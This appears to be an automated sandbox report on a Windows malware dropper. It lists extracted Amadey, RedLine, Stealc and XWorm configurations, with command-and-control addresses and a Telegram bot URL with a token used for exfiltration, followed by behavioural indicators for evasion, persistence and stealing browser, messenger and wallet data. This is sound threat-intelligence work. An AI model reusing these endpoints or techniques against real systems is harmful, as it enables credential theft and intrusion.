Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows11-21h2_x64 -
resource
win11-20240419-en -
resource tags
arch:x64arch:x86image:win11-20240419-enlocale:en-usos:windows11-21h2-x64system -
submitted
29-04-2024 11:52
Static task
static1
Behavioral task
behavioral1
Sample
7744c183f3dbcfa2c78274c26293f65039eea5535832ca47e740e0f60e42d9f0.exe
Resource
win10v2004-20240419-en
Behavioral task
behavioral2
Sample
7744c183f3dbcfa2c78274c26293f65039eea5535832ca47e740e0f60e42d9f0.exe
Resource
win11-20240419-en
General
-
Target
7744c183f3dbcfa2c78274c26293f65039eea5535832ca47e740e0f60e42d9f0.exe
-
Size
1.8MB
-
MD5
bf566129575a45e4eb59063f364913ef
-
SHA1
82ab797499cbf9faec158bb55bfef2c24086bc4a
-
SHA256
7744c183f3dbcfa2c78274c26293f65039eea5535832ca47e740e0f60e42d9f0
-
SHA512
2d1f0aeea9ac9efd2e8071f0696b1c4afecb9748a2a458b799c5fd67b58b4521d1257e30f8fceea9e57a657d3259044cca355ab2a78880cd6bafb43e964560f8
-
SSDEEP
24576:2dqrbnKGO+sgYNJQX1iSb0UcpxhT0t+AyPZx2ApfZ6t2Bc1eaCzHbSDAyjkegasm:a6vcvxhpfgtume1GjkFasi/9d1lF+rv
Malware Config
Extracted
amadey
4.17
http://193.233.132.167
-
install_dir
4d0ab15804
-
install_file
chrosha.exe
-
strings_key
1a9519d7b465e1f4880fa09a6162d768
-
url_paths
/enigma/index.php
Extracted
redline
@CLOUDYTTEAM
185.172.128.33:8970
Extracted
redline
Test1234
185.215.113.67:26260
Extracted
stealc
http://52.143.157.84
-
url_path
/c73eed764cc59dcb.php
Extracted
xworm
5.0
127.0.0.1:7000
91.92.252.220:7000
41.199.23.195:7000
saveclinetsforme68465454711991.publicvm.com:7000
bBT8anvIxhxDFmkf
-
Install_directory
%AppData%
-
install_file
explorer.exe
-
telegram
https://api.telegram.org/bot2128988424:AAEkYnwvOQA95riqRZwlqBxg4GV-odRNOyo/sendMessage?chat_id=966649672
Extracted
redline
cheat
saveclinetsforme68465454711991.publicvm.com:1111
Signatures
-
Detect Xworm Payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\1000239001\mstc.exe family_xworm behavioral2/memory/2684-382-0x00000000000A0000-0x00000000000B2000-memory.dmp family_xworm -
Detect ZGRat V1 3 IoCs
Processes:
resource yara_rule behavioral2/memory/4984-72-0x0000000000400000-0x0000000000592000-memory.dmp family_zgrat_v1 C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe family_zgrat_v1 behavioral2/memory/4664-132-0x0000000000830000-0x00000000008F0000-memory.dmp family_zgrat_v1 -
Modifies firewall policy service 2 TTPs 1 IoCs
Processes:
ie0aAKIgoNHvWYyFkf1CZCFR.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" ie0aAKIgoNHvWYyFkf1CZCFR.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 7 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe family_redline C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe family_redline behavioral2/memory/3932-112-0x0000000000330000-0x0000000000382000-memory.dmp family_redline behavioral2/memory/4664-132-0x0000000000830000-0x00000000008F0000-memory.dmp family_redline C:\Users\Admin\AppData\Local\Temp\1000152001\jok.exe family_redline behavioral2/memory/3024-176-0x00000000004D0000-0x0000000000522000-memory.dmp family_redline behavioral2/memory/2684-839-0x0000000000790000-0x00000000007AE000-memory.dmp family_redline -
SectopRAT payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/2684-839-0x0000000000790000-0x00000000007AE000-memory.dmp family_sectoprat -
Processes:
file300un.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" file300un.exe -
Processes:
file300un.exeie0aAKIgoNHvWYyFkf1CZCFR.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths file300un.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\1000238001\file300un.exe = "0" file300un.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ = "1" ie0aAKIgoNHvWYyFkf1CZCFR.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs
Processes:
7744c183f3dbcfa2c78274c26293f65039eea5535832ca47e740e0f60e42d9f0.exechrosha.exeie0aAKIgoNHvWYyFkf1CZCFR.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 7744c183f3dbcfa2c78274c26293f65039eea5535832ca47e740e0f60e42d9f0.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ chrosha.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ ie0aAKIgoNHvWYyFkf1CZCFR.exe -
Blocklisted process makes network request 4 IoCs
Processes:
rundll32.exerundll32.exerundll32.exeflow pid process 36 3984 rundll32.exe 49 2060 rundll32.exe 107 4852 rundll32.exe 49 2060 rundll32.exe -
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 8 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
7744c183f3dbcfa2c78274c26293f65039eea5535832ca47e740e0f60e42d9f0.exechrosha.exeie0aAKIgoNHvWYyFkf1CZCFR.exeInstall.exerundll32.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 7744c183f3dbcfa2c78274c26293f65039eea5535832ca47e740e0f60e42d9f0.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 7744c183f3dbcfa2c78274c26293f65039eea5535832ca47e740e0f60e42d9f0.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion chrosha.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion chrosha.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ie0aAKIgoNHvWYyFkf1CZCFR.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ie0aAKIgoNHvWYyFkf1CZCFR.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
ZilJVJq.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-734199974-1358367239-436541239-1000\Control Panel\International\Geo\Nation ZilJVJq.exe -
Executes dropped EXE 33 IoCs
Processes:
chrosha.exeswiiiii.exealexxxxxxxx.exegold.exekeks.exetrf.exeNewB.exejok.exeISetup8.exeswiiii.exetoolspub1.exe4767d2e713f2021e8fe856e3ea638b58.exefile300un.exemstc.exelie.exeGWyWImjPJrYl6admmUmbQ0no.exe3gDOeUlDsghAqoZiZwcsvUk8.exeAFKn6lGaqzeckkfrsADTscxf.exeYtVJ0C8eA764GvOCeDcLOEZg.exeYtVJ0C8eA764GvOCeDcLOEZg.exeYtVJ0C8eA764GvOCeDcLOEZg.exeYtVJ0C8eA764GvOCeDcLOEZg.exeYtVJ0C8eA764GvOCeDcLOEZg.exeVMfqgcBmOfC7mvnEpVVoTO7Y.exeie0aAKIgoNHvWYyFkf1CZCFR.exeInstall.exeInstall.exeAssistant_109.0.5097.45_Setup.exe_sfx.exeassistant_installer.exeassistant_installer.exeNewB.exeexplorer.exeZilJVJq.exepid process 1628 chrosha.exe 3496 swiiiii.exe 3068 alexxxxxxxx.exe 2132 gold.exe 3932 keks.exe 4664 trf.exe 4596 NewB.exe 3024 jok.exe 4784 ISetup8.exe 4268 swiiii.exe 4284 toolspub1.exe 3076 4767d2e713f2021e8fe856e3ea638b58.exe 2756 file300un.exe 2684 mstc.exe 2316 lie.exe 4180 GWyWImjPJrYl6admmUmbQ0no.exe 3916 3gDOeUlDsghAqoZiZwcsvUk8.exe 5032 AFKn6lGaqzeckkfrsADTscxf.exe 2088 YtVJ0C8eA764GvOCeDcLOEZg.exe 4580 YtVJ0C8eA764GvOCeDcLOEZg.exe 2296 YtVJ0C8eA764GvOCeDcLOEZg.exe 2916 YtVJ0C8eA764GvOCeDcLOEZg.exe 2148 YtVJ0C8eA764GvOCeDcLOEZg.exe 1452 VMfqgcBmOfC7mvnEpVVoTO7Y.exe 3696 ie0aAKIgoNHvWYyFkf1CZCFR.exe 4052 Install.exe 1284 Install.exe 2324 Assistant_109.0.5097.45_Setup.exe_sfx.exe 3744 assistant_installer.exe 1676 assistant_installer.exe 2772 NewB.exe 3896 explorer.exe 1456 ZilJVJq.exe -
Identifies Wine through registry keys 2 TTPs 2 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
Processes:
7744c183f3dbcfa2c78274c26293f65039eea5535832ca47e740e0f60e42d9f0.exechrosha.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-734199974-1358367239-436541239-1000\Software\Wine 7744c183f3dbcfa2c78274c26293f65039eea5535832ca47e740e0f60e42d9f0.exe Key opened \REGISTRY\USER\S-1-5-21-734199974-1358367239-436541239-1000\Software\Wine chrosha.exe -
Loads dropped DLL 13 IoCs
Processes:
rundll32.exerundll32.exerundll32.exeYtVJ0C8eA764GvOCeDcLOEZg.exeYtVJ0C8eA764GvOCeDcLOEZg.exeYtVJ0C8eA764GvOCeDcLOEZg.exeYtVJ0C8eA764GvOCeDcLOEZg.exeYtVJ0C8eA764GvOCeDcLOEZg.exeassistant_installer.exeassistant_installer.exerundll32.exepid process 3396 rundll32.exe 3984 rundll32.exe 2060 rundll32.exe 2088 YtVJ0C8eA764GvOCeDcLOEZg.exe 4580 YtVJ0C8eA764GvOCeDcLOEZg.exe 2296 YtVJ0C8eA764GvOCeDcLOEZg.exe 2916 YtVJ0C8eA764GvOCeDcLOEZg.exe 2148 YtVJ0C8eA764GvOCeDcLOEZg.exe 3744 assistant_installer.exe 3744 assistant_installer.exe 1676 assistant_installer.exe 1676 assistant_installer.exe 4852 rundll32.exe -
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule C:\Users\Admin\Pictures\ie0aAKIgoNHvWYyFkf1CZCFR.exe themida behavioral2/memory/3696-597-0x0000000140000000-0x0000000140786000-memory.dmp themida behavioral2/memory/3696-684-0x0000000140000000-0x0000000140786000-memory.dmp themida -
Processes:
file300un.exeie0aAKIgoNHvWYyFkf1CZCFR.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths file300un.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions file300un.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\1000238001\file300un.exe = "0" file300un.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ = "1" ie0aAKIgoNHvWYyFkf1CZCFR.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
mstc.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-734199974-1358367239-436541239-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" mstc.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
file300un.exeie0aAKIgoNHvWYyFkf1CZCFR.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA file300un.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" file300un.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA ie0aAKIgoNHvWYyFkf1CZCFR.exe -
Drops Chrome extension 2 IoCs
Processes:
ZilJVJq.exedescription ioc process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json ZilJVJq.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json ZilJVJq.exe -
Drops desktop.ini file(s) 1 IoCs
Processes:
ZilJVJq.exedescription ioc process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini ZilJVJq.exe -
Enumerates connected drives 3 TTPs 4 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
YtVJ0C8eA764GvOCeDcLOEZg.exeYtVJ0C8eA764GvOCeDcLOEZg.exedescription ioc process File opened (read-only) \??\D: YtVJ0C8eA764GvOCeDcLOEZg.exe File opened (read-only) \??\F: YtVJ0C8eA764GvOCeDcLOEZg.exe File opened (read-only) \??\D: YtVJ0C8eA764GvOCeDcLOEZg.exe File opened (read-only) \??\F: YtVJ0C8eA764GvOCeDcLOEZg.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 68 api.myip.com 73 ipinfo.io 74 ipinfo.io 25 ip-api.com 59 api.myip.com -
Drops file in System32 directory 35 IoCs
Processes:
ie0aAKIgoNHvWYyFkf1CZCFR.exeInstall.exeZilJVJq.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini ie0aAKIgoNHvWYyFkf1CZCFR.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies ZilJVJq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData ZilJVJq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE ZilJVJq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F3258A5B11F1178F530EE7A0197D8F15 ZilJVJq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA ZilJVJq.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 ZilJVJq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 ZilJVJq.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol ZilJVJq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 ZilJVJq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content ZilJVJq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA ZilJVJq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_5C77EC0FCAF0A83EAAF0F4351F61FA27 ZilJVJq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F3258A5B11F1178F530EE7A0197D8F15 ZilJVJq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_5C77EC0FCAF0A83EAAF0F4351F61FA27 ZilJVJq.exe File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol ie0aAKIgoNHvWYyFkf1CZCFR.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI ie0aAKIgoNHvWYyFkf1CZCFR.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache ZilJVJq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_F71C9FE0DBB76538B4EB93E5DEE9B878 ZilJVJq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_F71C9FE0DBB76538B4EB93E5DEE9B878 ZilJVJq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA ZilJVJq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA ZilJVJq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_91B924923180E8714F1EDBCBF8DDC70F ZilJVJq.exe File opened for modification C:\Windows\System32\GroupPolicy ie0aAKIgoNHvWYyFkf1CZCFR.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 ZilJVJq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft ZilJVJq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_91B924923180E8714F1EDBCBF8DDC70F ZilJVJq.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
Processes:
7744c183f3dbcfa2c78274c26293f65039eea5535832ca47e740e0f60e42d9f0.exechrosha.exeie0aAKIgoNHvWYyFkf1CZCFR.exepid process 4452 7744c183f3dbcfa2c78274c26293f65039eea5535832ca47e740e0f60e42d9f0.exe 1628 chrosha.exe 3696 ie0aAKIgoNHvWYyFkf1CZCFR.exe -
Suspicious use of SetThreadContext 5 IoCs
Processes:
swiiiii.exealexxxxxxxx.exegold.exeswiiii.exefile300un.exedescription pid process target process PID 3496 set thread context of 916 3496 swiiiii.exe RegAsm.exe PID 3068 set thread context of 4984 3068 alexxxxxxxx.exe RegAsm.exe PID 2132 set thread context of 4696 2132 gold.exe RegAsm.exe PID 4268 set thread context of 3840 4268 swiiii.exe RegAsm.exe PID 2756 set thread context of 4748 2756 file300un.exe jsc.exe -
Drops file in Program Files directory 14 IoCs
Processes:
ZilJVJq.exedescription ioc process File created C:\Program Files (x86)\zgoZGMcaU\sAfEORO.xml ZilJVJq.exe File created C:\Program Files (x86)\epoBtGYzqLvU2\TYrPUGCQcWGqm.dll ZilJVJq.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak ZilJVJq.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi ZilJVJq.exe File created C:\Program Files (x86)\epoBtGYzqLvU2\kvuTHLF.xml ZilJVJq.exe File created C:\Program Files (x86)\ecOJmsgAHWlsC\gmFjMYt.dll ZilJVJq.exe File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi ZilJVJq.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak ZilJVJq.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja ZilJVJq.exe File created C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR\qqjiZcs.xml ZilJVJq.exe File created C:\Program Files (x86)\ecOJmsgAHWlsC\AIHTAaQ.xml ZilJVJq.exe File created C:\Program Files (x86)\qIYKRzUEasUn\gggdOdx.dll ZilJVJq.exe File created C:\Program Files (x86)\zgoZGMcaU\YPGQWq.dll ZilJVJq.exe File created C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR\ketlGwn.dll ZilJVJq.exe -
Drops file in Windows directory 5 IoCs
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exe7744c183f3dbcfa2c78274c26293f65039eea5535832ca47e740e0f60e42d9f0.exedescription ioc process File created C:\Windows\Tasks\biPxHmULFllsbMgnpt.job schtasks.exe File created C:\Windows\Tasks\yfARWRprRqUFWeTGf.job schtasks.exe File created C:\Windows\Tasks\JHJXtPPPvDXVqpH.job schtasks.exe File created C:\Windows\Tasks\aNyMQclguOCSCcjxm.job schtasks.exe File created C:\Windows\Tasks\chrosha.job 7744c183f3dbcfa2c78274c26293f65039eea5535832ca47e740e0f60e42d9f0.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 3 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exepid pid_target process target process 4480 3496 WerFault.exe swiiiii.exe 1632 3068 WerFault.exe alexxxxxxxx.exe 2368 2132 WerFault.exe gold.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
RegAsm.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 RegAsm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString RegAsm.exe -
Creates scheduled task(s) 1 TTPs 12 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 2176 schtasks.exe 2120 schtasks.exe 3356 schtasks.exe 1980 schtasks.exe 3824 schtasks.exe 560 schtasks.exe 880 schtasks.exe 1196 schtasks.exe 4404 schtasks.exe 4020 schtasks.exe 72 schtasks.exe 2696 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
Processes:
Install.exerundll32.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exeZilJVJq.exeInstall.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix ZilJVJq.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" Install.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" Install.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created 